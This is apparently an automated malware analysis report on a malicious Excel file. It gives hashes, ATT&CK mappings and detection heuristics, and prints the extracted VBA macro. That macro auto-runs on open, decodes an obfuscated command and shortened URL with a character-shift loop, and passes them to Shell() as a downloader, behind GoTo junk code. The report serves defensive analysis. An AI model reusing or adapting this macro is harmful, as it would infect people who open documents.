Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 fff0f0cc113aa768…

MALICIOUS

Office (OOXML)

155.8 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-11-21
MD5: 0ac64af287d04576bf0acd8c489f4dcd SHA-1: 488f67509302f5272d67448ce43e1fadff7bfb3d SHA-256: fff0f0cc113aa76803c0c8e461c011155edc553901844f08fe020e9107d9b1e1
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The OOXML file contains a VBA macro that is automatically executed via the Auto_Open subroutine. This macro utilizes the Shell() function, combined with character-shifting to obfuscate the command, to execute an unknown payload. The presence of the Shell() call and the auto-execution mechanism strongly suggests a downloader or dropper functionality.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/aksodkaoskdoasdk.b)
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELL
    VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4161 bytes
SHA-256: 93079a263491cb8335eb8e08f0aa0f98bd01cdfcdd31fa382263ee8d4c60c41a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
Debug.Print MsgBox(qXglP77Xz("LYYVY(", "7"), vbOKCancel); returns; 1
Dim ynqvxPcX4 As String
Dim IztWb1wSm As String
Dim xrFCm28Ci As String
ynqvxPcX4 = qXglP77Xz("KBd qvlw {d{�{|mu;:dkitk6m€md66du{p|i(", "8")
IztWb1wSm = qXglP77Xz("jvvru<11yyy0dkvn{0eqo1", "2")
xrFCm28Ci = "wjdlidjwodkwodkdlidj"
Debug.Print ynqvxPcX4
Debug.Print IztWb1wSm
Debug.Print xrFCm28Ci
Debug.Print (Shell(ynqvxPcX4 + IztWb1wSm + xrFCm28Ci))
End Sub
Public Function qXglP77Xz(UE2EtbVNL As String, Rb47W0TWO As Integer)
    Dim wDJHxwWIO As Integer
    For wDJHxwWIO = 1 To Len(UE2EtbVNL)

GoTo hFAdfMSltiOKKINFMd
hFAdfMSltiOKKINFMd:
GoTo piepGUqeoLGklRmrzpU:
olThGGiqDfeCTuUgasbxhsyuF:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo mtvEcQACjpIQFlhhfkVc
mQrdtwzrPtYDsMCtHRAAnaBYkygx:
GoTo BbOMGZVsOntpAD
dQpmIfDvrDTjEsBZTxz:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo RRgXZRqTwydSmdUhsb
RRgXZRqTwydSmdUhsb:
GoTo fdiFLSxKJagYwLEpQZtV
TvPuSkwlicurOyIOK:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo noJLUsZCSzFZhVBxxwAm
noJLUsZCSzFZhVBxxwAm:
        Mid(UE2EtbVNL, wDJHxwWIO, 1) = Chr(Asc(Mid(UE2EtbVNL, wDJHxwWIO, 1)) - Rb47W0TWO)
GoTo mQrdtwzrPtYDsMCtHRAAnaBYkygx
mtvEcQACjpIQFlhhfkVc:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo AbaqgjbzdHFnwmdrBkkQQy
piepGUqeoLGklRmrzpU:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo aOOpwKmGlJbnbZTliF
aOOpwKmGlJbnbZTliF:
GoTo olThGGiqDfeCTuUgasbxhsyuF
REfBAdJcNRr:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo dQpmIfDvrDTjEsBZTxz
AbaqgjbzdHFnwmdrBkkQQy:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo oAFCNefBCLjQtJpyPX
oAFCNefBCLjQtJpyPX:
GoTo TvPuSkwlicurOyIOK
uHGQbeUuJCmTVrTYmwQ:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo REfBAdJcNRr
BbOMGZVsOntpAD:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo opzIDhwPkCxmSbcafPJ
opzIDhwPkCxmSbcafPJ:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo NsnomrcVdHiTjnphHj
NsnomrcVdHiTjnphHj:
GoTo uHGQbeUuJCmTVrTYmwQ
fdiFLSxKJagYwLEpQZtV:

    Next wDJHxwWIO

GoTo OuiDtkJrreRrObpWna
OuiDtkJrreRrObpWna:
GoTo VsOntpADSopzIDhwPkCx:
hnuZmlBFHzZngQyAU:
    qXglP77Xz = UE2EtbVNL
GoTo CPMvIiiJRfGbFev
iLNtNTbQwFGE:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo hnuZmlBFHzZngQyAU
QkshMIIHLxDKcCBRH:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo CbEjhODYNESdLLyza
sgRtPOqYpbf:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo grlDAQsQJFQixSFP
CPMvIiiJRfGbFev:
GoTo wHBTCaJTaVhyNUQgDyce
vQrVuMYMJDV:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo qakqmyOPlnwTBeubhAI
grlDAQsQJFQixSFP:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo iLNtNTbQwFGE
VsOntpADSopzIDhwPkCx:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo rjHQPzikEhmzJ
rjHQPzikEhmzJ:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo sgRtPOqYpbf
CbEjhODYNESdLLyza:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo vQrVuMYMJDV
wHBTCaJTaVhyNUQgDyce:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo QkshMIIHLxDKcCBRH
qakqmyOPlnwTBeubhAI:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo SbcafPJQuHGQ
SbcafPJQuHGQ:

End Function



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/aksodkaoskdoasdk.b 21504 bytes
SHA-256: 5bfe09d659d838ba3682e390b5485ed3b3e4a3ff7e1e152ffd38416c172a79d8

Open this report in the interactive analyzer, or submit your own file for analysis.